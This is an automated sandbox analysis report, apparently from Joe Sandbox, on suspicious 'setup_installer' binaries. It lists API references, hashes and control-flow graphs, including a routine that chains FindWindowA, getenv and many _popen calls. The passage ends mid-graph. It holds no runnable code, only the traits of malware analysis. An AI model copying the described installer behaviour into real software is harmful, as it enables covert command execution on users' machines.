                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$H_prologmemcpy
                                        • String ID: $!$@
                                        • API String ID: 3273695820-2517134481
                                        APIs
                                        • GetVersionExW.KERNEL32 ref: 004143F5
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,SetDefaultDllDirectories), ref: 00414418
                                        • GetProcAddress.KERNEL32(00000000), ref: 0041441F
                                        • GetSystemDirectoryW.KERNEL32(?,00000106), ref: 00414445
                                        • lstrlenW.KERNEL32(?), ref: 00414466
                                        • lstrcatW.KERNEL32(?,.dll), ref: 004144D7
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,00000000), ref: 004144E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemVersionlstrcatlstrlen
                                        • String ID: .dll$SetDefaultDllDirectories$\$\$kernel32.dll
                                        • API String ID: 532070074-471922092
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID:
                                        • API String ID: 1475443563-0
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,FindFirstStreamW), ref: 00404C48
                                        • GetProcAddress.KERNEL32(00000000), ref: 00404C51
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,FindNextStreamW), ref: 00404C5E
                                        • GetProcAddress.KERNEL32(00000000), ref: 00404C61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                        • API String ID: 1646373207-4044117955
                                        APIs
                                          • Part of subcall function 0040EB3D: _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EB60
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EE59
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EFB5
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EFC9
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F00A
                                        • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F072
                                          • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$free
                                        • String ID:
                                        • API String ID: 3129652135-3916222277
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0040BA1D
                                          • Part of subcall function 0040B871: EnterCriticalSection.KERNEL32(?,?,?,0040BB91), ref: 0040B876
                                          • Part of subcall function 0040B871: LeaveCriticalSection.KERNEL32(?,?,?,0040BB91), ref: 0040B880
                                        • EnterCriticalSection.KERNEL32(?), ref: 0040BA4A
                                        • LeaveCriticalSection.KERNEL32(?), ref: 0040BA66
                                        • __aulldiv.LIBCMT ref: 0040BAB5
                                        • SetWindowTextW.USER32(?,00000000), ref: 0040BB02
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$H_prologTextWindow__aulldiv
                                        • String ID:
                                        • API String ID: 729368748-0
                                        APIs
                                          • Part of subcall function 00418AC0: SetEvent.KERNEL32(?,00407A1F), ref: 00418AC3
                                        • GetDlgItem.USER32(?,00000064), ref: 0040B8AB
                                        • LoadIconW.USER32(00000000), ref: 0040B8C5
                                        • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 0040B8D6
                                        • SetTimer.USER32(?,00000003,00000064,00000000), ref: 0040B8E5
                                        • SetWindowTextW.USER32(?,?), ref: 0040B8F4
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                        • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: EventIconItemLoadMessageSendTextTimerWindow
                                        • String ID:
                                        • API String ID: 2712766465-0
                                        • Opcode ID: 699a61a99574d7652e0115c874616cdfe84062a62bf2c7ffebd4a9624ea64153
                                        • Instruction ID: e294c04aeed814171d4adbec44afb40f75d5ab8e46fef825956d7cc37fe38289
                                        • Opcode Fuzzy Hash: 699a61a99574d7652e0115c874616cdfe84062a62bf2c7ffebd4a9624ea64153
                                        • Instruction Fuzzy Hash: D9011A30040B40AFE7215B21DD5ABA6BBA1FB05720F008A2DFAA7959F0C775B852CB48
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID:
                                        • API String ID: 1475443563-0
                                        • Opcode ID: fc4689e578dc1cf89ed0c55786c74f8cf84f4324eb775046ffdacad481ac018b
                                        • Instruction ID: a37c9b6fd46fbe13aac1983c9063a21cde19e2a8279128ea102ca4b182acfc17
                                        • Opcode Fuzzy Hash: fc4689e578dc1cf89ed0c55786c74f8cf84f4324eb775046ffdacad481ac018b
                                        • Instruction Fuzzy Hash: 9411E931740304A7D7104F15EC02FEA73A89B94714F15483EFC4ABA3C2E67AF9A0969D
                                        APIs
                                          • Part of subcall function 00404B27: FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32
                                        • SetLastError.KERNEL32(00000078), ref: 00404C8F
                                        • SetLastError.KERNEL32(00000000), ref: 00404C99
                                        • FindFirstStreamW.KERNELBASE(?,00000000,?,00000000), ref: 00404CAD
                                        • GetLastError.KERNEL32 ref: 00404CBA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: ErrorLast$Find$CloseFirstStream
                                        • String ID:
                                        • API String ID: 4071060300-0
                                        • Opcode ID: e8f944988b9cb325842934f4d91b529ed218fe4a6d3146ed212e3958b088d38e
                                        • Instruction ID: e0df3afe617d72e22a27f99f1303fe5809e056bbf20cba425ebf9683b02a63d2
                                        • Opcode Fuzzy Hash: e8f944988b9cb325842934f4d91b529ed218fe4a6d3146ed212e3958b088d38e
                                        • Instruction Fuzzy Hash: 05F0F970405605E7EB202F20DC0D79637249B91326F104336E665B72E0C7B89D8ACB5C
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.1973301379.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.1973173068.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973422259.000000000041B000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973579297.000000000041F000.00000004.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.1973731488.0000000000423000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_setup_installer.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Unknown error$Unknown warning
                                        • API String ID: 3519838083-4291957651
                                        • Opcode ID: 9dde15fecc67fda54480402201b2371ac7cafa8d569a837fbeba078dd26f7487
                                        • Instruction ID: 8ba015e8ed9162120bf5fc528179e89f7f943c1107267e4dc13521d9f15a9599
                                        • Opcode Fuzzy Hash: 9dde15fecc67fda54480402201b2371ac7cafa8d569a837fbeba078dd26f7487
                                        • Instruction Fuzzy Hash: DB915B71900209DBCB24DFA9C990AEEB7F1FF48304F10856EE45AA7291D734AE49CB58

                                        Execution Graph

                                         Execution Coverage: 0.5%
                                         Dynamic/Decrypted Code Coverage: 0%
                                         Signature Coverage: 4.6%
                                         Total number of Nodes: 570
                                         Total number of Limit Nodes: 26

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                         • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort$fwritevfprintf
                                        • String ID:
                                        • API String ID: 2868300786-0
                                        • Opcode ID: af5f97742a825dff3c80760dc8132a253028146a0bc605ebe041e8cbfa5d0819
                                        • Instruction ID: e41cab24bbbf80130bade02cb0747bd2eff16b06b465fa276b94caa12873cc4b
                                        • Opcode Fuzzy Hash: af5f97742a825dff3c80760dc8132a253028146a0bc605ebe041e8cbfa5d0819
                                        • Instruction Fuzzy Hash: 74F0D0719493048AC300BF66C5862AEFAF0EF8A348F40DC1EF0C857142C77C80818B9B

                                        Control-flow Graph
                                        control_flow_graph 422 40115c-40117a 423 401430-401439 GetStartupInfoA 422->423 424 401180-401191 422->424 426 401441-40145a _initterm 423->426 425 4011a7-4011b3 424->425 427 401193-401195 425->427 428 4011b5-4011bf 425->428 433 401464 426->433 429 4013d0-4013dd 427->429 430 40119b-4011a4 Sleep 427->430 431 4013e3-4013f7 _amsg_exit 428->431 432 4011c5-4011cc 428->432 429->431 429->432 430->425 435 4011ea-4011ec 431->435 436 4013fd-40141d _initterm 431->436 432->426 434 4011d2-4011e4 432->434 439 40146c-401492 exit call 40ca60 433->439 434->435 434->436 437 4011f2-4011f9 435->437 438 401423-401429 435->438 436->437 436->438 440 401217-401257 call 40cef0 SetUnhandledExceptionFilter call 41bfc0 call 40cd70 __p__acmdln 437->440 441 4011fb-401214 437->441 451 401271-401277 440->451 452 401259 440->452 441->440 454 401260-401262 451->454 455 401279-401284 451->455 453 4012b4-4012bc 452->453 458 4012d2-4012f2 malloc 453->458 459 4012be-4012c7 453->459 456 401290-401292 454->456 457 401264-401267 454->457 460 40126e 455->460 464 401294 456->464 465 4012a5-4012ad 456->465 457->456 461 401269 457->461 458->433 466 4012f8-401309 458->466 462 4013c0-4013c4 459->462 463 4012cd 459->463 460->451 461->460 462->463 463->458 467 4012af 464->467 465->467 469 4012a0-4012a3 465->469 468 401310-401344 strlen malloc memcpy 466->468 467->453 468->468 470 401346-401398 call 40ca20 call 40165f 468->470 469->465 469->467 470->439 475 40139e-4013a6 470->475 476 4013b2-4013bd 475->476 477 4013a8-4013ad _cexit 475->477 477->476
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                                        • String ID:
                                        • API String ID: 1672962128-0
                                        • Opcode ID: 53538b4533ba164ef90a8db0a9fc0ea9866a4c7ba18965aafaba27d860817bfc
                                        • Instruction ID: 7f0f39de961eb26063c5e90d7adcfb4269c3a08c1b042310f1fe7f2674e2017b
                                        • Opcode Fuzzy Hash: 53538b4533ba164ef90a8db0a9fc0ea9866a4c7ba18965aafaba27d860817bfc
                                        • Instruction Fuzzy Hash: 2C818D719083448FDB10DF69D9C07AA7BE1FB45324F00847EE944AB3A2D7799C45CB8A

                                        Control-flow Graph
                                        control_flow_graph 586 4013c9-4013dd 588 4013e3-4013f7 _amsg_exit 586->588 589 4011c5-4011cc 586->589 592 4011ea-4011ec 588->592 593 4013fd-40141d _initterm 588->593 590 401441-40145a _initterm 589->590 591 4011d2-4011e4 589->591 596 401464 590->596 591->592 591->593 594 4011f2-4011f9 592->594 595 401423-401429 592->595 593->594 593->595 597 401217-401257 call 40cef0 SetUnhandledExceptionFilter call 41bfc0 call 40cd70 __p__acmdln 594->597 598 4011fb-401214 594->598 595->594 600 40146c-401492 exit call 40ca60 596->600 609 401271-401277 597->609 610 401259 597->610 598->597 612 401260-401262 609->612 613 401279-401284 609->613 611 4012b4-4012bc 610->611 616 4012d2-4012f2 malloc 611->616 617 4012be-4012c7 611->617 614 401290-401292 612->614 615 401264-401267 612->615 618 40126e 613->618 622 401294 614->622 623 4012a5-4012ad 614->623 615->614 619 401269 615->619 616->596 624 4012f8-401309 616->624 620 4013c0-4013c4 617->620 621 4012cd 617->621 618->609 619->618 620->621 621->616 625 4012af 622->625 623->625 627 4012a0-4012a3 623->627 626 401310-401344 strlen malloc memcpy 624->626 625->611 626->626 628 401346-401386 call 40ca20 call 40165f 626->628 627->623 627->625 632 40138b-401398 628->632 632->600 633 40139e-4013a6 632->633 634 4013b2-4013bd 633->634 635 4013a8-4013ad _cexit 633->635 635->634
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_cexit_inittermmemcpystrlen
                                        • String ID:
                                        • API String ID: 738594520-0
                                        • Opcode ID: 4dd5e5f985745f7e118c9626b52e5cbea5342cdb7049d461b6b66580b2f20d0a
                                        • Instruction ID: 3d4fbdc7d7a531b39a2c818e3d547337ecdca7df6cb770b93667e5f9bd008aac
                                        • Opcode Fuzzy Hash: 4dd5e5f985745f7e118c9626b52e5cbea5342cdb7049d461b6b66580b2f20d0a
                                        • Instruction Fuzzy Hash: 07411C709083418BDB10EF65D9C075ABBE0FB48324F10457EE948AB362D7789945CF5A

                                        Control-flow Graph
                                        control_flow_graph 636 401150-40117a 638 401430-401439 GetStartupInfoA 636->638 639 401180-401191 636->639 641 401441-40145a _initterm 638->641 640 4011a7-4011b3 639->640 642 401193-401195 640->642 643 4011b5-4011bf 640->643 648 401464 641->648 644 4013d0-4013dd 642->644 645 40119b-4011a4 Sleep 642->645 646 4013e3-4013f7 _amsg_exit 643->646 647 4011c5-4011cc 643->647 644->646 644->647 645->640 650 4011ea-4011ec 646->650 651 4013fd-40141d _initterm 646->651 647->641 649 4011d2-4011e4 647->649 654 40146c-401492 exit call 40ca60 648->654 649->650 649->651 652 4011f2-4011f9 650->652 653 401423-401429 650->653 651->652 651->653 655 401217-401257 call 40cef0 SetUnhandledExceptionFilter call 41bfc0 call 40cd70 __p__acmdln 652->655 656 4011fb-401214 652->656 653->652 666 401271-401277 655->666 667 401259 655->667 656->655 669 401260-401262 666->669 670 401279-401284 666->670 668 4012b4-4012bc 667->668 673 4012d2-4012f2 malloc 668->673 674 4012be-4012c7 668->674 671 401290-401292 669->671 672 401264-401267 669->672 675 40126e 670->675 679 401294 671->679 680 4012a5-4012ad 671->680 672->671 676 401269 672->676 673->648 681 4012f8-401309 673->681 677 4013c0-4013c4 674->677 678 4012cd 674->678 675->666 676->675 677->678 678->673 682 4012af 679->682 680->682 684 4012a0-4012a3 680->684 683 401310-401344 strlen malloc memcpy 681->683 682->668 683->683 685 401346-401398 call 40ca20 call 40165f 683->685 684->680 684->682 685->654 690 40139e-4013a6 685->690 691 4013b2-4013bd 690->691 692 4013a8-4013ad _cexit 690->692 692->691
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                                        • String ID:
                                        • API String ID: 1672962128-0
                                        • Opcode ID: cd126bc7a7c0183d7e4c726f9d3488adacf4119440ef7987faa819f9054f49bc
                                        • Instruction ID: 5a73557c9d0d0220e4833ada1b4f14b4f7ee444aa801d976e319a33373ffe0c5
                                        • Opcode Fuzzy Hash: cd126bc7a7c0183d7e4c726f9d3488adacf4119440ef7987faa819f9054f49bc
                                        • Instruction Fuzzy Hash: 85514C71A043408FDB11DF69D9C075ABBF0FB49328F10457EE948AB3A2D778A845CB99

                                        Control-flow Graph
                                        control_flow_graph 693 40fa29-40fa3e 694 499659 abort 693->694 695 40fa44-40fa4f 693->695 698 49965e-49967e abort * 5 694->698 696 40fa70-40fa75 695->696 697 40fa51-40fa57 695->697 696->697 701 40fa77-40fa81 696->701 697->694 699 40fa5d-40fa66 697->699 705 499680 698->705 699->696 705->705
                                        APIs
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: c3958b69a29253442853df63de800c7c9b5e3d3323e0584bd7214dddfe859f89
                                        • Instruction ID: 90822e3a823855a74ae1923b3367c552f02d7a1981c36e4a34a9c47522a55612
                                        • Opcode Fuzzy Hash: c3958b69a29253442853df63de800c7c9b5e3d3323e0584bd7214dddfe859f89
                                        • Instruction Fuzzy Hash: DFF06271A043414AD210EF5E94567BABBA0FB82314F84586EE64427293C73C9C88CADE

                                        Control-flow Graph
                                        control_flow_graph 833 40fe40-40fe84 call 40f4a0 836 40fed2-40feda call 40f720 833->836 837 40fe86 call 40f650 833->837 841 40fe8b-40fe8e 836->841 843 49965e-49967e abort * 5 836->843 837->841 842 40fe94-40fed1 call 40f850 call 40fc30 841->842 841->843 852 499680 843->852 852->852
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_once
                                        • String ID:
                                        • API String ID: 3286866217-0
                                        • Opcode ID: d7c1e95de4ec08dfa10c667e1d8b8ea849ed7de8eabcd2a5f6fcc23cd1de2301
                                        • Instruction ID: 1d22a9e5e9d9321e174116b029eada938af3a821a58e412d884a90dfdfd0e460
                                        • Opcode Fuzzy Hash: d7c1e95de4ec08dfa10c667e1d8b8ea849ed7de8eabcd2a5f6fcc23cd1de2301
                                        • Instruction Fuzzy Hash: 4B114F32A0021C9BCF24EF95C8819EEB7B4EF85314F10847EAD0977341DB34AE498AD5

                                        Control-flow Graph
                                        control_flow_graph 0 40165f-401cf8 call 40ca20 FindWindowA getenv call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 458470 call 458440 call 485fa0 call 494ec0 call 494de0 call 486620 * 2 call 458470 call 42a130 _popen Sleep call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 162 401d48-401db0 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 0->162 163 401cfa-401d43 call 494fb0 call 486680 call 486620 0->163 179 401e00-401e68 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 162->179 180 401db2-401dfb call 494fb0 call 486680 call 486620 162->180 163->162 196 401eb8-401f20 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 179->196 197 401e6a-401eb3 call 494fb0 call 486680 call 486620 179->197 180->179 213 401f70-401fd8 call 494ff8 call 42a130 _popen call 486620 call 42a130 call 4015e8 196->213 214 401f22-401f6b call 494fb0 call 